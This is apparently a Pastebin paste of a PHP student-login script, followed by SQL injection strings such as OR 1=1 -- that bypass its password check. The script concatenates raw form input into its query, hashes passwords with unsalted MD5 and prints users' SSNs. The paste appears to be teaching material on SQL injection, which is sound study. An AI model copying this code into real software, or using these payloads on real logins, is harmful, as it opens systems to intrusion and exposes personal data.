Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- <form method="post" action="login.php">
- $connect = mysqli_connect($dbhost, $dbuser, $dbpass) or die("Unable to connect to '$dbhost'");
- mysqli_select_db($connect,$dbname) or die("Could not open the database '$dbname'");
- $message="";
- $username = $_POST["uname"];
- $pass_raw = $_POST["password"];
- $password = md5($pass_raw);
- $result = mysqli_query($connect,"SELECT * FROM students WHERE uname='" . $username . "' and password = '". $password."'");
- $row = mysqli_fetch_array($result);
- if(is_array($row)) {
- echo "Congratulations! you have logged in!";
- printf("Your First Name %s and Last Name is %s", $row[3], $row[4]);
- printf("Your SSN is %s ", $row[5]);
- } else {
- $message = "Invalid Username or Password!";
- echo "invalid user ";
- }
- SELECT * FROM students WHERE uname='' OR '' = '' AND password = '$password'
- SELECT * FROM students WHERE uname='' OR ('' = '' AND password = '$password')
- SELECT * FROM students WHERE uname='' OR uname='admin' --' AND password = '$password'
- SELECT * FROM students WHERE uname='' OR 1=1 --' AND password = '$password'
Add Comment
Please, Sign In to add comment
